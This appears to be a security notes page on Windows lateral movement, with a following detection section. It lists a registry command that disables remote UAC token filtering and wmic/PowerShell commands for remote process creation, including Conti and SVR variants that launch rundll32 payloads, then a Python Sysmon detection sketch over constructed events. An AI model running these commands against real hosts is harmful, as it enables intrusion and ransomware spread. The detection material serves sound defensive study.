# Lateral Movement

## Disable Remote UAC Restrictions

{% code overflow="wrap" %}

```powershell
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
```

{% endcode %}

## WMIC

Source: <https://www.picussecurity.com/resource/blog/t1047-windows-management-instrumentation-of-the-mitre-attack-framework>

WMI allows users with the required privileges to execute commands on remote hosts without additional tools. Adversaries abuse this feature to move laterally in a compromised network. The following commands have been used by adversaries to execute a command on a remote host.

{% code overflow="wrap" %}

```powershell
wmic /node:<remote_ip> /user:<username> /password:<password> process call create cmd.exe /c "<command>"
```

{% endcode %}

Or, with PowerShell:

{% code overflow="wrap" %}

```powershell
Invoke-WMIMethod -class Win32_Process -Name Create -ArgumentList "cmd /c <command>" -ComputerName <remote_hostname>
```

{% endcode %}

Conti TTP

{% code overflow="wrap" %}

```powershell
wmic /node:victim_ip process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"
```

{% endcode %}

Russian Foreign Intelligence Service (SVR) TTP

{% code overflow="wrap" %}

```powershell
wmic /node:<remote_host's_IP> /user:<username> /password:<password> process call create "rundll32 C:\Windows\system32\AclNumsInvertHost.dll AclNumsInvertHost"
```

{% endcode %}
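Both techniques on this page leave distinctive host telemetry: the registry write that sets `LocalAccountTokenFilterPolicy` to 1 (which turns off UAC token filtering for remote logons by local administrator accounts), the `wmic /node: ... process call create` or `Invoke-WMIMethod ... -ComputerName` command line on the source host, and, on the target host, a process such as `rundll32.exe` whose parent is the WMI provider host `WmiPrvSE.exe`. The following detection sketch is an added example, not code from the original page or from the Picus article; it assumes Sysmon-style records (Event ID 1 for process creation, Event ID 13 for registry value set) and runs over a constructed set of events that includes the commands shown above plus benign look-alikes.

```python
"""Detection sketch for remote UAC token-filter changes and WMI remote process
creation. Added example; the event records below are constructed and the field
names assume Sysmon conventions (EventID 1 = process create, 13 = registry set)."""
import ntpath
import re

# Constructed sample events, not real telemetry.
SAMPLE_EVENTS = [
    # 0: remote UAC token filtering disabled via reg.exe (the page's first command)
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy",
     "Details": "DWORD (0x00000001)"},
    # 1: unrelated registry write, must not fire
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": "C:\\Program Files\\Updater\\upd.exe"},
    # 2: wmic remote process creation seen on the source host
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'wmic /node:10.0.0.5 /user:CORP\\svc_backup /password:***** '
                    'process call create "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"'},
    # 3: local wmic inventory query, must not fire
    {"EventID": 1, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "wmic os get Caption,Version"},
    # 4: PowerShell variant of the same technique
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -c Invoke-WMIMethod -class Win32_Process -Name Create "
                    "-ArgumentList 'cmd /c whoami' -ComputerName FS01"},
    # 5: target-host view: rundll32 spawned by the WMI provider host
    {"EventID": 1, "Image": r"C:\Windows\System32\rundll32.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "rundll32.exe C:/ProgramData/beacon_dll DllRegisterServer"},
    # 6: WmiPrvSE spawning a (hypothetical) vendor agent, must not fire
    {"EventID": 1, "Image": r"C:\Program Files\VendorAgent\collector.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "collector.exe --inventory"},
]

UAC_KEY_SUFFIX = r"\policies\system\localaccounttokenfilterpolicy"
WMIC_REMOTE_RE = re.compile(r"/node:\S+.*\bprocess\s+call\s+create\b", re.IGNORECASE)
# Parameters of Invoke-WmiMethod may appear in any order, so match each separately.
PS_WMI_PATTERNS = (r"\bInvoke-(Wmi|Cim)Method\b", r"\bWin32_Process\b", r"-ComputerName\b")
# Interpreters and LOLBins that are suspicious as direct children of WmiPrvSE.exe.
LOLBIN_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "rundll32.exe",
                   "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def basename(path):
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path or "").lower()


def remote_uac_filter_disabled(ev):
    return (ev.get("EventID") == 13
            and ev.get("TargetObject", "").lower().endswith(UAC_KEY_SUFFIX)
            and "0x00000001" in ev.get("Details", ""))


def wmic_remote_process_create(ev):
    return (ev.get("EventID") == 1 and basename(ev.get("Image")) == "wmic.exe"
            and bool(WMIC_REMOTE_RE.search(ev.get("CommandLine", ""))))


def powershell_wmi_remote_create(ev):
    cmd = ev.get("CommandLine", "")
    return (ev.get("EventID") == 1
            and basename(ev.get("Image")) in {"powershell.exe", "pwsh.exe"}
            and all(re.search(p, cmd, re.IGNORECASE) for p in PS_WMI_PATTERNS))


def wmiprvse_spawned_lolbin(ev):
    return (ev.get("EventID") == 1
            and basename(ev.get("ParentImage")) == "wmiprvse.exe"
            and basename(ev.get("Image")) in LOLBIN_CHILDREN)


RULES = {
    "remote_uac_filter_disabled": remote_uac_filter_disabled,
    "wmic_remote_process_create": wmic_remote_process_create,
    "powershell_wmi_remote_create": powershell_wmi_remote_create,
    "wmiprvse_spawned_lolbin": wmiprvse_spawned_lolbin,
}


def scan(events):
    """Return (rule_name, event_index) for every rule that fires on every event."""
    return [(name, idx) for idx, ev in enumerate(events)
            for name, rule in RULES.items() if rule(ev)]


if __name__ == "__main__":
    for name, idx in scan(SAMPLE_EVENTS):
        print(f"{name}: event {idx} -> {SAMPLE_EVENTS[idx].get('CommandLine') or SAMPLE_EVENTS[idx].get('TargetObject')}")
```

The source-host rules depend on command-line logging; the PowerShell variant is easily hidden behind an encoded command or a script file, so pairing them with Script Block Logging (Event ID 4104) is advisable. The `WmiPrvSE.exe` parent rule is the one that does not depend on what the operator typed and therefore catches the Conti and SVR `rundll32` variants above as well as any other payload launched through `Win32_Process.Create`.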
